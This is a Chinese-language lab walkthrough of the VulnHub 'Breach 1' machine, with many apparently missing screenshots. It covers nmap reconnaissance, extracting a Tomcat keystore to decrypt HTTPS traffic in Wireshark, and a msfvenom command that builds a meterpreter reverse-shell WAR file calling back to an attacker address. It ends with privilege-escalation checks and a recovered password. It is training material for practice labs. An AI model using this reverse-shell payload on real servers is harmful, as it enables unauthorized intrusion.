靶场环境
   
https://www.vulnhub.com/
    
    
    配置靶机网络
   
     
   
    
     
   
    
    
    工具准备
   
    准备一个kali
    
    
    burpsuite
    
    wireshark
    
    CTF编码工具
    
    kali反弹 192.168.110.128
    
    breach1 192.168.110.140
    
    kali攻击 192.168.202.129
    
     
   
    
    
    端口扫描信息收集
   
    nmap -T4 -A -v 192.168.110.140
    
    
    
    得到这么多端口,猜测可能是添加了一些安全产品
   
思路:按照常用的端口为80,打开网站看看
    
    
    思路:翻译看看
    
     
   
    思路:保存图片到本地,打开stu.baidu.com查看这张图的来源
    
    
    
    
    思路:查看一下源码
    
    
    
    思路:想想编码的特征
    
    
    
    
    
    
    思路:猜测这个很可能是用户名和密码
   
    看到鼠标一接近那个图片就会变成手的形状,可以点点看
    
     
   
     
   
    思路:使用目录扫描dirb
    
    
    没有什么发现
   
    
    
    指纹识别
   
- 
     Wappalyzer安装插件
 
  
 
   
- whatweb
     
   
- msf
    
    
    
    全部尝试一下,发现都不成功
   
    
    
    CMS后台信息收集
   
    
    
    
    
    
    
    
    
    
     
   
这是一个密钥库的文件
     
   
    
    
    解密HTTPS流量
   
     
   
     
   
    
    HTTP的端口为8443
   
    
    
    
    
    补充:使用keytool.exe生成一个密钥库
    
    
    查看密钥库的内容
    
    
    生成证书
    
     
   
    提取证书
    
    keytool -importkeystore -srckeystore D:\vulnhub\2-breach1\keystore -destkeystore D:\vulnhub\2-breach1\tomcat.p12 -deststoretype PKCS12 -srcalias tomcat
    
    
    
     
   
     
   
    新版本为TLS
    
     
   
    
    
    过滤查看一下数据包
    
    ip.src ==192.168.110.140 || ip.dst == 192.168.110.140 and http
   
    
     
   
     
   
    获取的证书是不安全,服务器不接受
    
    
    
     
   
     
   
     
   
     
   
     
   
     
   
     
   
    
    
    Tomcat后台利用
   
    利用Kali-129生成木马
    
     
   
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.128 lport=4444 -f war -o kali.war
    
    
    
    
    
    点击/kali
    
    迅速放包
    
    
    
     
   
    
    
    Linux提权
   
     
   
    1,搜索漏洞
    
    2,find ; ls -a
    
    3,history
    
    4,sudo -l
    
    5,uname -a
    
    
    
    
    
    
    
    
     
   
     
   
    
    
    
    没有什么,乖乖的从头开始
    
    
    
     
   
     
   
    
    
    尝试登录
   
    
    
    
    
     
   
    
    
    
    
    密码为coffeestains
   
    
     
   
     
   
    
    
    
    
    
    
    
    
     
   
 
